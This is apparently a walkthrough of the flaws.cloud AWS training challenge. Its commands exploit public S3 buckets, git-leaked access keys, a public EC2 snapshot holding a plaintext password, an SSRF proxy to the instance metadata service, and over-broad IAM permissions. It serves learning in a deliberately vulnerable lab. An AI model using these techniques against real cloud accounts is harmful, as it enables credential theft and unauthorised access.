flaws.cloud

• LEVEL-1

• LEVEL-2

• LEVEL-3

• LEVEL-4

• LEVEL-5

• LEVEL-6

Level 1

URL

Flaw: Permission Misconfiguration: Anyone could list the bucket content.

• List the bucket contents for flaws.cloud

  aws s3 ls s3://flaws.cloud --no-sign-request

• Get the html file

  aws s3 cp s3://flaws.cloud/secret-dd02c7c.html . --no-sign-request

Level 2

URL

AWS ACCOUNT AND CLI CONFIGURATION NEEDED !!!

Configure AWS CLI with Access Key ID and Secret Access Key

$ aws configure --profile YOUR_PROFILE                            
AWS Access Key ID [********************]: 
AWS Secret Access Key [********************]: 
Default region name [ap-south-1]: 
Default output format [text]:

Flaw: Any authenticated AWS user could list the bucket contents

• List the bucket contents for the url using AWS account

  aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud --profile YOUR_PROFILE

• Get the secret html file

  aws s3 cp s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html . --profile YOUR_PROFILE

Level 3

URL

Flaw: Bucket listing permissions for everyone and leaked access keys in git commits

• List the bucket contents for the url using AWS profile

  aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --profile YOUR_PROFILE

• Download the .git folder

  aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git l3-dump  --profile YOUR_PROFILE

• Check the git logs

  git log

• Check the first commit

  git checkout {commit hash}

• Check the commit contents

  git show

• Create a profile using the credentials

  aws configure --profile flaws-l3

  • Enter AKIA and Secret access Key from the git commit

• List all the buckets for the newly created profile

  aws s3 ls --profile flaws-l3

Level 4

URL ec2 url

Flaw: Snapshot of EC2 instance made public

• Use nslookup and get the region of the snapshot

  • nslookup 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

  • Region: us-west-2

• Using the flaws-l3 profile look for ec2 snapshots

  aws ec2 describe-snapshots --profile flaws-l3

• Get account id for the flaws-l3 keys

  aws --profile flaws sts get-caller-identity

• List the ec2 snapshots for the particular owner

  aws ec2 describe-snapshots --profile flaws-l3 --owner-id {owner-id} --region us-west-2

• Mount the volume using the snapshot id to your acc

  aws --profile {YOUR_ACCOUNT} ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

• Create an ec2 instance in the us-west-2 region

• Attach the snapshot as an extra volume

• Connect to the ec2 instance using ssh with the keypair while setting up the ec2

  ssh -i "flaws4.pem" ubuntu@ec2-35-85-61-84.us-west-2.compute.amazonaws.com

• Mount the volume

  • sudo file -s /dev/xvdf1

  • sudo mount /dev/xvdf1 /mnt

• Look around in the snapshot

  • We get credentials in /home/ubuntu/setupNginx.sh

    • flaws:nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

• Enter the credentials here

• Terminate the EC2 instance

Level 5

URL

Flaw: exposed proxy which doesn't restrict access to instance's meta-data server and private IP range

The IP address 169.254.169.254 is a magic IP in the cloud world. AWS, Azure, Google, DigitalOcean and others use this to allow cloud resources to find out metadata about themselves.

Each EC2 instance has metadata available on a magic private (only itself can access) IP address 169.254.169.254. The juiciest part of this metadata, are the credentials for the Instance Profile (if one is set), which can be retrieved through a web request to http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance/.

• Get the meta-data listing

  curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/

• We get credentials at this url

  curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

• Configure using the keys

  aws configure --profile flaws-l5```

• Add the Access Key ID, Secret Access key and Session token to /.aws/credentials

• List the contents of the level6 bucket

  aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud --profile flaws-l5

Level 6

URL

**Flaw: Extra permissions given to policies **

• Create a profile using the provided credentials

  aws configure --profile flaws-l6

• Get other info about the profile

  aws --profile flaws-l6 iam get-user

• List the IAM policies attached to the user

  aws --profile flaws-l6 iam list-attached-user-policies --user-name Level6

• Get more info on the policy list_apigateways

  aws --profile flaws-l6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways

• Get the version of the policy

  aws --profile flaws-l6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4

• The policy tells us we can GET on the resource arn:aws:apigateway:us-west-2::/restapis/*

• Enumerating the other policy MySecurityAudit, it lets us see some things about lambdas.

• List the lambda functions

  aws --profile flaws-l6 --region us-west-2 lambda list-functions

• Get policy for the function

  aws --profile flaws-l6 --region us-west-2 lambda get-policy --function-name Level6

• Use the API ID: s33ppypa75 and get the stage

  aws --profile flaws-l6 --region us-west-2 apigateway get-stages --rest-api-id s33ppypa75

• That tells you the stage name is "Prod". Lambda functions are called using that rest-api-id, stage name, region, and resource as

  • Format: https://<API-id>.execute-api.<region>.amazonaws.com/<stage-name>/<resource>

    • API-id: s33ppypa75

    • Region: us-west-2

    • Stage: Prod

    • Resource: level6

  • URL : https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

  • On visting the url it displays another URL which is the final URL

 _____  _       ____  __    __  _____
|     || |     /    ||  |__|  |/ ___/
|   __|| |    |  o  ||  |  |  (   \_ 
|  |_  | |___ |     ||  |  |  |\__  |
|   _] |     ||  _  ||  `  '  |/  \ |
|  |   |     ||  |  | \      / \    |
|__|   |_____||__|__|  \_/\_/   \___|
		flAWS - The End